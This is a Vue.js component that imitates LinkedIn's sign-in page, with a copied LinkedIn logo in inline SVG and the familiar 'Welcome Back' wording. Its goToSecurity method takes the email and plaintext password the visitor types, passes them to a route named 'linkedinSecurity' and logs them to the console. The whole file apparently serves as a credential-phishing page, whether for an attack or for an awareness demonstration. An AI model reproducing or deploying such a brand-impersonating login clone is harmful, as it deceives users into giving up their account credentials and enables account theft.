<template>
  <v-container pa-4>
    <v-layout column>
    <!-- <v-btn flat icon color="black" v-on:click="$router.go(-1)">
      <v-icon>arrow_back</v-icon>
    </v-btn> -->

    <svg version="1.1" id="LinkedIn" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 width="100px" height="75px" viewBox="0 0 400 300" enable-background="new 0 0 400 300" xml:space="preserve">
<polygon fill="#231F20" points="28.715,113.65 14.104,113.65 14.104,180.35 55.767,180.35 55.767,166.867 28.715,166.867 "/>
<path fill="#231F20" d="M69.242,112.661c-4.493,0-8.142,3.65-8.141,8.144c0,4.5,3.649,8.141,8.141,8.141
	c4.498,0,8.147-3.64,8.147-8.141C77.39,116.311,73.74,112.661,69.242,112.661z"/>
<rect x="62.221" y="135.13" fill="#231F20" width="14.044" height="45.202"/>
<polygon fill="#231F20" points="182.123,135.111 164.91,135.111 149.008,153.509 149.008,113.646 134.969,113.646 134.969,180.35 
	149.008,180.35 149.008,158.005 149.189,158.005 164.09,180.35 181.737,180.35 163.703,156.039 "/>
<path fill="#231F20" d="M110.992,134.015c-6.833,0-11.421,3.743-13.292,7.301h-0.188v-6.178h-13.48v45.194h14.044v-22.354
	c0-5.893,1.119-11.605,8.42-11.605c7.209,0,7.306,6.736,7.306,11.98v21.979h14.043v-24.789
	C127.846,143.375,125.226,134.015,110.992,134.015z"/>
<path fill="#231F20" d="M204.375,133.75c-14.039,0-25.274,9.361-25.274,23.869c0,14.513,11.235,23.879,25.274,23.879
	c7.308,0,14.699-3.28,19.193-8.993l-9.829-7.208c-2.341,3.184-5.428,5.523-10.017,5.523c-5.432,0-9.464-3.463-10.578-8.801h32.579
	v-4.4C225.725,143.111,217.494,133.75,204.375,133.75z M193.146,152.477c0.37-4.4,3.743-8.614,9.919-8.614
	c5.061,0,8.711,3.934,8.618,8.614H193.146z"/>
<path fill="#231F20" d="M265.086,113.646v26.047h-0.183c-3.184-4.4-8.612-5.99-14.422-5.99c-12.919,0-20.782,11.608-20.782,24.249
	c0,13.765,8.893,23.496,22.377,23.496c6.368,0,11.793-3.84,13.953-7.115h0.182v5.994h12.924h0.002v-66.68H265.086z M254.972,169.089
	c-7.017,0-11.229-4.675-11.229-11.515c0-6.828,4.213-11.514,11.229-11.514c7.026,0,11.239,4.682,11.239,11.514
	C266.211,164.414,261.998,169.089,254.972,169.089z"/>
<path fill="#0077B5" d="M380.887,99.642H300.17c-3.857,0-6.991,3.057-6.991,6.824v81.058c0,3.771,3.134,6.834,6.991,6.834h80.717
	c3.863,0,7.011-3.061,7.011-6.834v-81.058C387.897,102.699,384.75,99.642,380.887,99.642z"/>
<path fill="#FFFFFF" d="M307.222,135.151h14.05v45.201h-14.05V135.151z M314.25,112.681c4.491,0,8.143,3.65,8.143,8.143
	c0,4.497-3.65,8.147-8.143,8.147c-4.502,0-8.146-3.65-8.146-8.147C306.103,116.333,309.748,112.681,314.25,112.681"/>
<path fill="#FFFFFF" d="M330.084,135.151h13.473v6.177h0.188c1.876-3.554,6.459-7.301,13.293-7.301
	c14.226,0,16.854,9.362,16.854,21.532v24.793h-14.039v-21.982c0-5.242-0.097-11.984-7.301-11.984c-7.311,0-8.434,5.711-8.434,11.605
	v22.361h-14.036v-45.201H330.084z"/>
</svg>
    <h2>Welcome Back</h2>
    <p>Don't miss your next opportunity. Sign in to stay updated on your professional world.
</p>
  <v-form v-model="valid" v-on:submit.prevent="onSubmit">
    <v-text-field
      v-model="email"
      :rules="emailRules"
      label="Email or phone"
      required
    ></v-text-field>
    <v-text-field
      v-on:keyup.enter="goToSecurity"
      v-model="password"
      :rules="nameRules"
      label="password"
      :type="showPass ? 'text' : 'password'"
      required
      :append-icon="showPass ? 'visibility' : 'visibility_off'"
      @click:append="showPass = !showPass"
    ></v-text-field>
    
  </v-form>
  <v-btn v-on:click="goToSecurity" small color="#015DA5" dark depressed>Sign in</v-btn>

    <router-link to="">Forgot password?</router-link>
    <p>New to LinkedIn? <router-link to="/"> Join now</router-link> </p>
  
  </v-layout>
  </v-container>
</template>

<script>
export default {
  data() {
    return {
      valid: false,
      email: "",
      password: "",
      showPass: false,
      emailRules: [
        v => !!v || 'E-mail is required',
        v => /.+@.+/.test(v) || 'E-mail must be valid'
      ],
      nameRules: [],
      Checkbox: "",
      checkbox: false
    }
  },

  methods: {
    goToSecurity() {
      this.$router.push({ name: 'linkedinSecurity', params: { email: this.email, password: this.password  } })
      console.log(this.email, this.password)
    }
  }
}
</script>
<style>

</style>